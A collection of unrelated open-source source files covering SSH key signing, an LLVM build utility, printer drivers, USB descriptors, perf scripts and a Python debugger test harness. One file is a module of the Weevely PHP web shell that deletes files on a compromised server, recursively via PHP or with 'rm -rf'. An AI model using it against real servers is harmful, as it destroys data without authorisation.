digest = sha.new(data).digest()
return pkcs1Pad(ID_SHA1+digest, lMod)
def lenSig(obj):
return obj.size()/8
def signData(obj, data):
"""
Sign the data with the given C{Crypto.PublicKey.pubkey.pubkey} object.
@type obj: C{Crypto.PublicKey.pubkey.pubkey}
@type data: C{str}
@rtype: C{str}
"""
mapping = {
'ssh-rsa': signData_rsa,
'ssh-dss': signData_dsa
}
objType = objectType(obj)
return common.NS(objType)+mapping[objType](obj, data)
def signData_rsa(obj, data):
sigData = pkcs1Digest(data, lenSig(obj))
sig = obj.sign(sigData, '')[0]
return common.NS(Util.number.long_to_bytes(sig)) # get around adding the \x00 byte
def signData_dsa(obj, data):
sigData = sha.new(data).digest()
randData = common.entropy.get_bytes(19)
sig = obj.sign(sigData, randData)
# SSH insists that the DSS signature blob be two 160-bit integers
# concatenated together. The sig[0], [1] numbers from obj.sign are just
# numbers, and could be any length from 0 to 160 bits. Make sure they
# are padded out to 160 bits (20 bytes each)
return common.NS(Util.number.long_to_bytes(sig[0], 20) +
Util.number.long_to_bytes(sig[1], 20))
def verifySignature(obj, sig, data):
"""
Verify that the signature for the data is valid.
@type obj: C{Crypto.PublicKey.pubkey.pubkey}
@type sig: C{str}
@type data: C{str}
@rtype: C{bool}
"""
mapping = {
'ssh-rsa': verifySignature_rsa,
'ssh-dss': verifySignature_dsa,
}
objType = objectType(obj)
sigType, sigData = common.getNS(sig)
if objType != sigType: # object and signature are not of same type
return 0
return mapping[objType](obj, sigData, data)
def verifySignature_rsa(obj, sig, data):
sigTuple = [common.getMP(sig)[0]]
return obj.verify(pkcs1Digest(data, lenSig(obj)), sigTuple)
def verifySignature_dsa(obj, sig, data):
sig = common.getNS(sig)[0]
assert(len(sig) == 40)
l = len(sig)/2
sigTuple = map(Util.number.bytes_to_long, [sig[: l], sig[l:]])
return obj.verify(sha.new(data).digest(), sigTuple)
def printKey(obj):
"""
Pretty print a C{Crypto.PublicKey.pubkey.pubkey} object.
@type obj: C{Crypto.PublicKey.pubkey.pubkey}
"""
print '%s %s (%s bits)'%(objectType(obj),
obj.hasprivate()and 'Private Key'or 'Public Key',
obj.size())
for k in obj.keydata:
if hasattr(obj, k):
print 'attr', k
by = common.MP(getattr(obj, k))[4:]
while by:
m = by[: 15]
by = by[15:]
o = ''
for c in m:
o = o+'%02x:'%ord(c)
if len(m) < 15:
o = o[:-1]
print '\t'+o
ID_SHA1 = '\x30\x21\x30\x09\x06\x05\x2b\x0e\x03\x02\x1a\x05\x00\x04\x14'
| gpl-3.0 |
vinutah/apps | tools/llvm/llvm_39/opt/utils/llvm-build/llvmbuild/configutil.py | 121 | 2084 | """
Defines utilities useful for performing standard "configuration" style tasks.
"""
import re
import os
def configure_file(input_path, output_path, substitutions):
"""configure_file(input_path, output_path, substitutions) -> bool
Given an input and output path, "configure" the file at the given input path
by replacing variables in the file with those given in the substitutions
list. Returns true if the output file was written.
The substitutions list should be given as a list of tuples (regex string,
replacement), where the regex and replacement will be used as in 're.sub' to
execute the variable replacement.
The output path's parent directory need not exist (it will be created).
If the output path does exist and the configured data is not different than
it's current contents, the output file will not be modified. This is
designed to limit the impact of configured files on build dependencies.
"""
# Read in the input data.
f = open(input_path, "rb")
try:
data = f.read()
finally:
f.close()
# Perform the substitutions.
for regex_string,replacement in substitutions:
regex = re.compile(regex_string)
data = regex.sub(replacement, data)
# Ensure the output parent directory exists.
output_parent_path = os.path.dirname(os.path.abspath(output_path))
if not os.path.exists(output_parent_path):
os.makedirs(output_parent_path)
# If the output path exists, load it and compare to the configured contents.
if os.path.exists(output_path):
current_data = None
try:
f = open(output_path, "rb")
try:
current_data = f.read()
except:
current_data = None
f.close()
except:
current_data = None
if current_data is not None and current_data == data:
return False
# Write the output contents.
f = open(output_path, "wb")
try:
f.write(data)
finally:
f.close()
return True
| gpl-3.0 |
mahinthjoe/bedrock | bedrock/thunderbird/views.py | 17 | 1073 | # -*- coding: utf-8 -*-
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from lib import l10n_utils
from bedrock.thunderbird.details import thunderbird_desktop
from lib.l10n_utils.dotlang import _
def all_downloads(request, channel):
if channel is None:
channel = 'release'
if channel == 'earlybird':
channel = 'alpha'
version = thunderbird_desktop.latest_version(channel)
query = request.GET.get('q')
channel_names = {
'release': _('Thunderbird'),
'beta': _('Thunderbird Beta'),
'alpha': _('Earlybird'),
}
context = {
'full_builds_version': version.split('.', 1)[0],
'full_builds': thunderbird_desktop.get_filtered_full_builds(channel, version, query),
'query': query,
'channel': channel,
'channel_name': channel_names[channel]
}
return l10n_utils.render(request, 'thunderbird/all.html', context)
| mpl-2.0 |
JeyZeta/Dangerous | Dangerous/Weevely/modules/file/rm.py | 3 | 2814 |
from core.moduleguess import ModuleGuess
from core.moduleexception import ModuleException, ProbeSucceed, ProbeException, ExecutionException
from core.argparse import ArgumentParser
WARN_NO_SUCH_FILE = 'No such file or permission denied'
WARN_DELETE_FAIL = 'Cannot remove, check permission or recursion'
WARN_DELETE_OK = 'File deleted'
class Rm(ModuleGuess):
'''Remove remote files and folders'''
def _set_vectors(self):
self.vectors.add_vector('php_rmdir', 'shell.php', """
function rmfile($dir) {
if (is_dir("$dir")) rmdir("$dir");
else { unlink("$dir"); }
}
function exists($path) {
return (file_exists("$path") || is_link("$path"));
}
function rrmdir($recurs,$dir) {
if($recurs=="1") {
if (is_dir("$dir")) {
$objects = scandir("$dir");
foreach ($objects as $object) {
if ($object != "." && $object != "..") {
if (filetype($dir."/".$object) == "dir") rrmdir($recurs, $dir."/".$object); else unlink($dir."/".$object);
}
}
reset($objects);
rmdir("$dir");
}
else rmfile("$dir");
}
else rmfile("$dir");
}
$recurs="$recursive"; $path="$rpath";
if(exists("$path"))
rrmdir("$recurs", "$path");""")
self.vectors.add_vector('rm', 'shell.sh', "rm $recursive $rpath")
def _set_args(self):
self.argparser.add_argument('rpath', help='Remote starting path')
self.argparser.add_argument('-recursive', help='Remove recursively', action='store_true')
self.argparser.add_argument('-vector', choices = self.vectors.keys())
def _prepare(self):
self._result = False
self.modhandler.load('file.check').run([ self.args['rpath'], 'exists' ])
if not self.modhandler.load('file.check')._result:
raise ProbeException(self.name, WARN_NO_SUCH_FILE)
def _prepare_vector(self):
self.formatted_args = { 'rpath' : self.args['rpath'] }
if self.current_vector.name == 'rm':
self.formatted_args['recursive'] = '-rf' if self.args['recursive'] else ''
else:
self.formatted_args['recursive'] = '1' if self.args['recursive'] else ''
def _verify_vector_execution(self):
self.modhandler.load('file.check').run([ self.args['rpath'], 'exists' ])
result = self.modhandler.load('file.check')._result
if result == False:
self._result = True
raise ProbeSucceed(self.name, WARN_DELETE_OK)
def _verify(self):
raise ProbeException(self.name, WARN_DELETE_FAIL)
def _stringify_result(self):
self._output = '' | mit |
meng89/wpi | wpi/driver.py | 1 | 1345 | from win32com.client import GetObject
import hooky
_OBJ_NAME = 'Win32_PrinterDriver'
B32 = 'Windows NT x86'
B64 = 'Windows x64'
class Drivers(hooky.Dict):
def __init__(self):
super().__init__()
self._Driver = GetObject('winmgmts:/root/cimv2').Get('Win32_PrinterDriver')
def __iter__(self):
for _ in self._Driver.instances_():
yield tuple(_.name.rsplit(',', 2))
def __setitem__(self, key, value):
raise TypeError('not support this yet!')
def add_by_inf(self, inf_path, name, platform=None):
if inf_path is None:
raise ValueError
self._Driver.Name = name
self._Driver.InfName = inf_path
# default is os platform
if platform is not None:
self._Driver.SupportedPlatform = platform
method = self._Driver.Methods_('AddPrinterDriver')
in_parms = method.InParameters
in_parms.DriverInfo = self._Driver
self._Driver.ExecMethod_('AddPrinterDriver', in_parms)
def __delitem__(self, key):
wmi = GetObject('winmgmts:/root/cimv2')
drivers = wmi.InstancesOf(_OBJ_NAME)
for driver in drivers:
if key == driver.name.rsplit(',', 2):
driver.Delete_()
return
raise Exception
if __name__ == '__main__':
pass
| lgpl-3.0 |
rpwagner/tiled-display | flTile/configs/localTestLargeConfig.py | 1 | 1310 | import sys, os
sys.path = [os.path.join(os.getcwd(), "..") ] + sys.path
from tileConfig import TileConfig, TileDesc, MachineDesc, SaveConfig, LoadConfig, TileLocation, Rect, LocalWindow
def CreateLocalTestConfig():
c = TileConfig()
t0 = TileDesc( (400, 400), (0,0), ":0", localWindowId=0)
t1 = TileDesc( (400, 400), (400, 0), ":0", lrtbMullions=(0,0,0,0), location=TileLocation( (400,0), relative=t0.uid), localWindowId=0)
print "t1 relative:", t1.location.relative
t2 = TileDesc( (400, 400), (0,400), ":0", localWindowId=0, location=TileLocation( (0,400), relative=t0.uid))
t3 = TileDesc( (400, 400), (400, 400), ":0", lrtbMullions=(0,0,0,0), location=TileLocation( (400,0), relative=t2.uid), localWindowId=0)
localWindow = LocalWindow(Rect(0,0,800,800))
m3 = MachineDesc( "maze", tiles = [t0, t1, t2, t3], windows=[localWindow])
c.addMachine(m3)
return c
if __name__ == "__main__":
c = CreateLocalTestConfig()
SaveConfig(c, "/tmp/testconfig")
print c.asDict()
c2 = LoadConfig("/tmp/testconfig")
if c == c2:
print "PASS: Saved and reread config matched original."
else:
print "FAIL: Saved and reread config did not match original. Saving as testconfig2 for comparison"
SaveConfig(c2, "/tmp/testconfig2")
| apache-2.0 |
nccgroup/umap2 | umap2/core/usb_device_capability.py | 1 | 4279 | '''
Device capabilities
As defined in USB 3.1 spec, section 9.6.2
'''
import struct
from umap2.core.usb import DescriptorType
from umap2.core.usb_base import USBBaseActor
from umap2.fuzz.helpers import mutable
class USBDeviceCapability(USBBaseActor):
WIRELESS_USB = 0x01
USB_20_EXTENSION = 0x02
SUPERSPEED_USB = 0x03
CONTAINER_ID = 0x04
PLATFORM = 0x05
POWER_DELIVERY_CAPABILITY = 0x06
BATTERY_INFO_CAPABILITY = 0x07
PD_CONSUMER_PORT_CAPABILITY = 0x08
PD_PROVIDER_PORT_CAPABILITY = 0x09
SUPERSPEED_PLUS = 0x0A
PRECISION_TIME_MEASUREMENT = 0x0B
WIRELESS_USB_EXT = 0x0C
def __init__(self, app, phy, cap_type, data):
'''
:param app: Umap2 application
:param phy: Physical connection
:param cap_type: Capability type
:param data: the capability data (string)
'''
super(USBDeviceCapability, self).__init__(app, phy)
self.cap_type = cap_type
self.cap_data = data
@mutable('device_capability_descriptor')
def get_descriptor(self, usb_type='fullspeed', valid=False):
bDescriptorType = DescriptorType.device_capability
bLength = 3 + len(self.cap_data)
d = struct.pack(
'<BBB',
bLength,
bDescriptorType,
self.cap_type
)
return d + self.cap_data
#
# Specific device capability classes
#
class DCUsb20Extension(USBDeviceCapability):
'''
USB 2.0 Extension capability is defined in USB 3.1 spec, section 9.6.2.1
'''
ATTR_LPM = 0x00000002
ATTR_NONE = 0x00000000
def __init__(self, app, phy, attributes=ATTR_NONE):
data = struct.pack('<I', attributes)
super(DCUsb20Extension, self).__init__(app, phy, self.USB_20_EXTENSION, data)
self.attributes = attributes
class DCSuperspeedUsb(USBDeviceCapability):
'''
Superspeed USB capability is defined in USB 3.1 spec, section 9.6.2.2
'''
def __init__(self, app, phy, attributes, speeds_supported, functionality_support, u1dev_exit_lat, u2dev_exit_lat):
data = struct.pack('<BHBBH', attributes, speeds_supported, functionality_support, u1dev_exit_lat, u2dev_exit_lat)
super(DCSuperspeedUsb, self).__init__(app, phy, self.SUPERSPEED_USB, data)
self.attributes = attributes
self.speeds_supported = speeds_supported
self.functionality_support = functionality_support
self.u1dev_exit_lat = u1dev_exit_lat
self.u2dev_exit_lat = u2dev_exit_lat
class DCContainerId(USBDeviceCapability):
'''
Container ID capability is defined in USB 3.1 spec, section 9.6.2.3
'''
def __init__(self, app, phy, container_id):
data = b'\x00' + container_id
super(DCContainerId, self).__init__(app, phy, self.CONTAINER_ID, data)
self.container_id = container_id
class DCPlatform(USBDeviceCapability):
'''
Platform capability is defined in USB 3.1 spec, section 9.6.2.4
'''
def __init__(self, app, phy, platform_capability_uuid, capability_data=b''):
data = b'\x00' + platform_capability_uuid + capability_data
super(DCPlatform, self).__init__(app, phy, self.PLATFORM, data)
self.platform_capability_uuid = platform_capability_uuid
self.capability_data = capability_data
class DCSuperspeedPlusUsb(USBDeviceCapability):
'''
Superspeed Plus USB capability is defined in USB 3.1 spec, section 9.6.2.5
'''
def __init__(self, app, phy, attributes, functionality_support, sublink_speed_attributes):
data = struct.pack('<BIHH', 0, attributes, 0, functionality_support)
for sls_attr in sublink_speed_attributes:
data += struct.pack('<I', sls_attr)
super(DCSuperspeedPlusUsb, self).__init__(app, phy, self.SUPERSPEED_PLUS, data)
self.attributes = attributes
self.functionality_support = functionality_support
self.sublink_speed_attributes = sublink_speed_attributes
class DCPrecisionTimeMeasurement(USBDeviceCapability):
'''
Precision Time Measurement capability is defined in USB 3.1 spec, section 9.6.2.6
'''
def __init__(self, app, phy):
super(DCPrecisionTimeMeasurement, self).__init__(app, phy, self.PRECISION_TIME_MEASUREMENT, b'')
| agpl-3.0 |
pocketbook-free/kernel_622 | tools/perf/scripts/python/syscall-counts.py | 944 | 1429 | # system call counts
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
usage = "perf trace -s syscall-counts.py [comm]\n";
for_comm = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
pass
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
print "%-40d %10d\n" % (id, val),
| gpl-2.0 |
akurtakov/Pydev | plugins/org.python.pydev.core/pysrc/tests_python/debugger_unittest.py | 1 | 21638 | try:
from urllib import quote, quote_plus, unquote_plus
except ImportError:
from urllib.parse import quote, quote_plus, unquote_plus #@UnresolvedImport
import os
import socket
import subprocess
import sys
import threading
import time
from _pydev_bundle import pydev_localhost
IS_PY3K = sys.version_info[0] >= 3
# Note: copied (don't import because we want it to be independent on the actual code because of backward compatibility).
CMD_RUN = 101
CMD_LIST_THREADS = 102
CMD_THREAD_CREATE = 103
CMD_THREAD_KILL = 104
CMD_THREAD_SUSPEND = 105
CMD_THREAD_RUN = 106
CMD_STEP_INTO = 107
CMD_STEP_OVER = 108
CMD_STEP_RETURN = 109
CMD_GET_VARIABLE = 110
CMD_SET_BREAK = 111
CMD_REMOVE_BREAK = 112
CMD_EVALUATE_EXPRESSION = 113
CMD_GET_FRAME = 114
CMD_EXEC_EXPRESSION = 115
CMD_WRITE_TO_CONSOLE = 116
CMD_CHANGE_VARIABLE = 117
CMD_RUN_TO_LINE = 118
CMD_RELOAD_CODE = 119
CMD_GET_COMPLETIONS = 120
# Note: renumbered (conflicted on merge)
CMD_CONSOLE_EXEC = 121
CMD_ADD_EXCEPTION_BREAK = 122
CMD_REMOVE_EXCEPTION_BREAK = 123
CMD_LOAD_SOURCE = 124
CMD_ADD_DJANGO_EXCEPTION_BREAK = 125
CMD_REMOVE_DJANGO_EXCEPTION_BREAK = 126
CMD_SET_NEXT_STATEMENT = 127
CMD_SMART_STEP_INTO = 128
CMD_EXIT = 129
CMD_SIGNATURE_CALL_TRACE = 130
CMD_SET_PY_EXCEPTION = 131
CMD_GET_FILE_CONTENTS = 132
CMD_SET_PROPERTY_TRACE = 133
# Pydev debug console commands
CMD_EVALUATE_CONSOLE_EXPRESSION = 134
CMD_RUN_CUSTOM_OPERATION = 135
CMD_GET_BREAKPOINT_EXCEPTION = 136
CMD_STEP_CAUGHT_EXCEPTION = 137
CMD_SEND_CURR_EXCEPTION_TRACE = 138
CMD_SEND_CURR_EXCEPTION_TRACE_PROCEEDED = 139
CMD_IGNORE_THROWN_EXCEPTION_AT = 140
CMD_ENABLE_DONT_TRACE = 141
CMD_SHOW_CONSOLE = 142
CMD_GET_ARRAY = 143
CMD_STEP_INTO_MY_CODE = 144
CMD_GET_CONCURRENCY_EVENT = 145
CMD_VERSION = 501
CMD_RETURN = 502
CMD_ERROR = 901
# Always True (because otherwise when we do have an error, it's hard to diagnose).
SHOW_WRITES_AND_READS = True
SHOW_OTHER_DEBUG_INFO = True
SHOW_STDOUT = True
try:
from thread import start_new_thread
except ImportError:
from _thread import start_new_thread # @UnresolvedImport
try:
xrange
except:
xrange = range
#=======================================================================================================================
# ReaderThread
#=======================================================================================================================
class ReaderThread(threading.Thread):
def __init__(self, sock):
threading.Thread.__init__(self)
try:
from queue import Queue
except ImportError:
from Queue import Queue
self.setDaemon(True)
self.sock = sock
self._queue = Queue()
self.all_received = []
self._kill = False
def get_next_message(self, context_messag):
try:
msg = self._queue.get(block=True, timeout=15)
except:
raise AssertionError('No message was written in 15 seconds. Error message:\n%s' % (context_messag,))
else:
frame = sys._getframe().f_back
frame_info = ' -- File "%s", line %s, in %s\n' % (frame.f_code.co_filename, frame.f_lineno, frame.f_code.co_name)
frame_info += ' -- File "%s", line %s, in %s\n' % (frame.f_back.f_code.co_filename, frame.f_back.f_lineno, frame.f_back.f_code.co_name)
frame = None
sys.stdout.write('Message returned in get_next_message(): %s -- ctx: %s, returned to:\n%s\n' % (msg, context_messag, frame_info))
return msg
def run(self):
try:
buf = ''
while not self._kill:
l = self.sock.recv(1024)
if IS_PY3K:
l = l.decode('utf-8')
self.all_received.append(l)
buf += l
while '\n' in buf:
# Print each part...
i = buf.index('\n')+1
last_received = buf[:i]
buf = buf[i:]
if SHOW_WRITES_AND_READS:
print('Test Reader Thread Received %s' % (last_received, ))
self._queue.put(last_received)
except:
pass # ok, finished it
finally:
del self.all_received[:]
def do_kill(self):
self._kill = True
if hasattr(self, 'sock'):
self.sock.close()
class DebuggerRunner(object):
def get_command_line(self):
'''
Returns the base command line (i.e.: ['python.exe', '-u'])
'''
raise NotImplementedError
def add_command_line_args(self, args):
writer_thread = self.writer_thread
port = int(writer_thread.port)
localhost = pydev_localhost.get_localhost()
ret = args + [
writer_thread.get_pydevd_file(),
'--DEBUG_RECORD_SOCKET_READS',
'--qt-support',
'--client',
localhost,
'--port',
str(port),
]
if writer_thread.IS_MODULE:
ret += ['--module']
ret = ret + ['--file'] + writer_thread.get_command_line_args()
return ret
def check_case(self, writer_thread_class):
writer_thread = writer_thread_class()
try:
writer_thread.start()
for _i in xrange(40000):
if hasattr(writer_thread, 'port'):
break
time.sleep(.01)
self.writer_thread = writer_thread
args = self.get_command_line()
args = self.add_command_line_args(args)
if SHOW_OTHER_DEBUG_INFO:
print('executing', ' '.join(args))
ret = self.run_process(args, writer_thread)
finally:
writer_thread.do_kill()
writer_thread.log = []
stdout = ret['stdout']
stderr = ret['stderr']
writer_thread.additional_output_checks(''.join(stdout), ''.join(stderr))
return ret
def create_process(self, args, writer_thread):
process = subprocess.Popen(
args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
cwd=writer_thread.get_cwd() if writer_thread is not None else '.',
env=writer_thread.get_environ() if writer_thread is not None else None,
)
return process
def run_process(self, args, writer_thread):
process = self.create_process(args, writer_thread)
stdout = []
stderr = []
finish = [False]
try:
def read(stream, buffer):
for line in stream.readlines():
if finish[0]:
return
if IS_PY3K:
line = line.decode('utf-8')
if SHOW_STDOUT:
sys.stdout.write('stdout: %s' % (line,))
buffer.append(line)
start_new_thread(read, (process.stdout, stdout))
if SHOW_OTHER_DEBUG_INFO:
print('Both processes started')
# polls can fail (because the process may finish and the thread still not -- so, we give it some more chances to
# finish successfully).
initial_time = time.time()
shown_intermediate = False
while True:
if process.poll() is not None:
break
else:
if writer_thread is not None:
if not writer_thread.isAlive():
if writer_thread.FORCE_KILL_PROCESS_WHEN_FINISHED_OK:
process.kill()
continue
if not shown_intermediate and (time.time() - initial_time > 10):
print('Warning: writer thread exited and process still did not (%.2fs seconds elapsed).' % (time.time() - initial_time,))
shown_intermediate = True
if time.time() - initial_time > 20:
process.kill()
time.sleep(.2)
self.fail_with_message(
"The other process should've exited but still didn't (%.2fs seconds timeout for process to exit)." % (time.time() - initial_time,),
stdout, stderr, writer_thread
)
time.sleep(.2)
if writer_thread is not None:
if not writer_thread.FORCE_KILL_PROCESS_WHEN_FINISHED_OK:
poll = process.poll()
if poll < 0:
self.fail_with_message(
"The other process exited with error code: " + str(poll), stdout, stderr, writer_thread)
if stdout is None:
self.fail_with_message(
"The other process may still be running -- and didn't give any output.", stdout, stderr, writer_thread)
check = 0
while 'TEST SUCEEDED' not in ''.join(stdout):
check += 1
if check == 50:
self.fail_with_message("TEST SUCEEDED not found in stdout.", stdout, stderr, writer_thread)
time.sleep(.1)
for _i in xrange(100):
if not writer_thread.finished_ok:
time.sleep(.1)
if not writer_thread.finished_ok:
self.fail_with_message(
"The thread that was doing the tests didn't finish successfully.", stdout, stderr, writer_thread)
finally:
finish[0] = True
return {'stdout':stdout, 'stderr':stderr}
def fail_with_message(self, msg, stdout, stderr, writerThread):
raise AssertionError(msg+
"\n\n===========================\nStdout: \n"+''.join(stdout)+
"\n\n===========================\nStderr:"+''.join(stderr)+
"\n\n===========================\nLog:\n"+'\n'.join(getattr(writerThread, 'log', [])))
#=======================================================================================================================
# AbstractWriterThread
#=======================================================================================================================
class AbstractWriterThread(threading.Thread):
FORCE_KILL_PROCESS_WHEN_FINISHED_OK = False
IS_MODULE = False
def __init__(self):
threading.Thread.__init__(self)
self.setDaemon(True)
self.finished_ok = False
self._next_breakpoint_id = 0
self.log = []
def additional_output_checks(self, stdout, stderr):
pass
def get_environ(self):
return None
def get_pydevd_file(self):
dirname = os.path.dirname(__file__)
dirname = os.path.dirname(dirname)
return os.path.abspath(os.path.join(dirname, 'pydevd.py'))
def get_cwd(self):
return os.path.dirname(self.get_pydevd_file())
def get_command_line_args(self):
return [self.TEST_FILE]
def do_kill(self):
if hasattr(self, 'server_socket'):
self.server_socket.close()
if hasattr(self, 'reader_thread'):
# if it's not created, it's not there...
self.reader_thread.do_kill()
if hasattr(self, 'sock'):
self.sock.close()
def write(self, s):
self.log.append('write: %s' % (s,))
if SHOW_WRITES_AND_READS:
print('Test Writer Thread Written %s' % (s,))
msg = s + '\n'
if IS_PY3K:
msg = msg.encode('utf-8')
self.sock.send(msg)
def start_socket(self, port=None):
from _pydev_bundle.pydev_localhost import get_socket_name
if SHOW_WRITES_AND_READS:
print('start_socket')
if port is None:
socket_name = get_socket_name(close=True)
else:
socket_name = (pydev_localhost.get_localhost(), port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(socket_name)
self.port = socket_name[1]
s.listen(1)
if SHOW_WRITES_AND_READS:
print('Waiting in socket.accept()')
self.server_socket = s
newSock, addr = s.accept()
if SHOW_WRITES_AND_READS:
print('Test Writer Thread Socket:', newSock, addr)
reader_thread = self.reader_thread = ReaderThread(newSock)
reader_thread.start()
self.sock = newSock
self._sequence = -1
# initial command is always the version
self.write_version()
self.log.append('start_socket')
def next_breakpoint_id(self):
self._next_breakpoint_id += 1
return self._next_breakpoint_id
def next_seq(self):
self._sequence += 2
return self._sequence
def wait_for_new_thread(self):
# wait for hit breakpoint
last = ''
while not '<xml><thread name="' in last or '<xml><thread name="pydevd.' in last:
last = self.reader_thread.get_next_message('wait_for_new_thread')
# we have something like <xml><thread name="MainThread" id="12103472" /></xml>
splitted = last.split('"')
thread_id = splitted[3]
return thread_id
def wait_for_breakpoint_hit(self, *args, **kwargs):
return self.wait_for_breakpoint_hit_with_suspend_type(*args, **kwargs)[:-1]
def wait_for_breakpoint_hit_with_suspend_type(self, reason='111', get_line=False, get_name=False):
'''
108 is over
109 is return
111 is breakpoint
'''
self.log.append('Start: wait_for_breakpoint_hit')
# wait for hit breakpoint
last = ''
while not ('stop_reason="%s"' % reason) in last:
last = self.reader_thread.get_next_message('wait_for_breakpoint_hit. reason=%s' % (reason,))
# we have something like <xml><thread id="12152656" stop_reason="111"><frame id="12453120" name="encode" ...
splitted = last.split('"')
suspend_type = splitted[7]
thread_id = splitted[1]
frameId = splitted[9]
name = splitted[11]
if get_line:
self.log.append('End(0): wait_for_breakpoint_hit: %s' % (last,))
try:
if not get_name:
return thread_id, frameId, int(splitted[15]), suspend_type
else:
return thread_id, frameId, int(splitted[15]), name, suspend_type
except:
raise AssertionError('Error with: %s, %s, %s.\nLast: %s.\n\nAll: %s\n\nSplitted: %s' % (
thread_id, frameId, splitted[13], last, '\n'.join(self.reader_thread.all_received), splitted))
self.log.append('End(1): wait_for_breakpoint_hit: %s' % (last,))
if not get_name:
return thread_id, frameId, suspend_type
else:
return thread_id, frameId, name, suspend_type
def wait_for_custom_operation(self, expected):
# wait for custom operation response, the response is double encoded
expected_encoded = quote(quote_plus(expected))
last = ''
while not expected_encoded in last:
last = self.reader_thread.get_next_message('wait_for_custom_operation. Expected (encoded): %s' % (expected_encoded,))
return True
def _is_var_in_last(self, expected, last):
if expected in last:
return True
last = unquote_plus(last)
if expected in last:
return True
# We actually quote 2 times on the backend...
last = unquote_plus(last)
if expected in last:
return True
return False
def wait_for_multiple_vars(self, expected_vars):
if not isinstance(expected_vars, (list, tuple)):
expected_vars = [expected_vars]
all_found = []
while True:
try:
last = self.reader_thread.get_next_message('wait_for_multiple_vars: %s' % (expected_vars,))
except:
missing = []
for v in expected_vars:
if v not in all_found:
missing.append(v)
raise ValueError('Not Found:\n%s\nNot found messages: %s\nFound messages: %s\nExpected messages: %s' % (
'\n'.join(missing), len(missing), len(all_found), len(expected_vars)))
found = 0
for expected in expected_vars:
if isinstance(expected, (tuple, list)):
for e in expected:
if self._is_var_in_last(e, last):
all_found.append(expected)
found += 1
break
else:
if self._is_var_in_last(expected, last):
all_found.append(expected)
found += 1
if found == len(expected_vars):
return True
wait_for_var = wait_for_multiple_vars
wait_for_vars = wait_for_multiple_vars
wait_for_evaluation = wait_for_multiple_vars
def write_make_initial_run(self):
self.write("101\t%s\t" % self.next_seq())
self.log.append('write_make_initial_run')
def write_version(self):
self.write("501\t%s\t1.0\tWINDOWS\tID" % self.next_seq())
def get_main_filename(self):
return self.TEST_FILE
def write_add_breakpoint(self, line, func):
'''
@param line: starts at 1
'''
breakpoint_id = self.next_breakpoint_id()
self.write("111\t%s\t%s\t%s\t%s\t%s\t%s\tNone\tNone" % (self.next_seq(), breakpoint_id, 'python-line', self.get_main_filename(), line, func))
self.log.append('write_add_breakpoint: %s line: %s func: %s' % (breakpoint_id, line, func))
return breakpoint_id
def write_add_exception_breakpoint(self, exception):
self.write("122\t%s\t%s" % (self.next_seq(), exception))
self.log.append('write_add_exception_breakpoint: %s' % (exception,))
def write_add_exception_breakpoint_with_policy(self, exception, notify_always, notify_on_terminate, ignore_libraries):
self.write("122\t%s\t%s" % (self.next_seq(), '\t'.join([exception, notify_always, notify_on_terminate, ignore_libraries])))
self.log.append('write_add_exception_breakpoint: %s' % (exception,))
def write_remove_breakpoint(self, breakpoint_id):
self.write("112\t%s\t%s\t%s\t%s" % (self.next_seq(), 'python-line', self.get_main_filename(), breakpoint_id))
def write_change_variable(self, thread_id, frame_id, varname, value):
self.write("117\t%s\t%s\t%s\t%s\t%s\t%s" % (self.next_seq(), thread_id, frame_id, 'FRAME', varname, value))
def write_get_frame(self, thread_id, frameId):
self.write("114\t%s\t%s\t%s\tFRAME" % (self.next_seq(), thread_id, frameId))
self.log.append('write_get_frame')
def write_get_variable(self, thread_id, frameId, var_attrs):
self.write("110\t%s\t%s\t%s\tFRAME\t%s" % (self.next_seq(), thread_id, frameId, var_attrs))
def write_step_over(self, thread_id):
self.write("108\t%s\t%s" % (self.next_seq(), thread_id,))
def write_step_in(self, thread_id):
self.write("107\t%s\t%s" % (self.next_seq(), thread_id,))
def write_step_return(self, thread_id):
self.write("109\t%s\t%s" % (self.next_seq(), thread_id,))
def write_suspend_thread(self, thread_id):
self.write("105\t%s\t%s" % (self.next_seq(), thread_id,))
def write_run_thread(self, thread_id):
self.log.append('write_run_thread')
self.write("106\t%s\t%s" % (self.next_seq(), thread_id,))
def write_kill_thread(self, thread_id):
self.write("104\t%s\t%s" % (self.next_seq(), thread_id,))
def write_set_next_statement(self, thread_id, line, func_name):
self.write("%s\t%s\t%s\t%s\t%s" % (CMD_SET_NEXT_STATEMENT, self.next_seq(), thread_id, line, func_name,))
def write_debug_console_expression(self, locator):
self.write("%s\t%s\t%s" % (CMD_EVALUATE_CONSOLE_EXPRESSION, self.next_seq(), locator))
def write_custom_operation(self, locator, style, codeOrFile, operation_fn_name):
self.write("%s\t%s\t%s||%s\t%s\t%s" % (CMD_RUN_CUSTOM_OPERATION, self.next_seq(), locator, style, codeOrFile, operation_fn_name))
def write_evaluate_expression(self, locator, expression):
self.write("113\t%s\t%s\t%s\t1" % (self.next_seq(), locator, expression))
def write_enable_dont_trace(self, enable):
if enable:
enable = 'true'
else:
enable = 'false'
self.write("%s\t%s\t%s" % (CMD_ENABLE_DONT_TRACE, self.next_seq(), enable))
def _get_debugger_test_file(filename):
try:
rPath = os.path.realpath # @UndefinedVariable
except:
# jython does not support os.path.realpath
# realpath is a no-op on systems without islink support
rPath = os.path.abspath
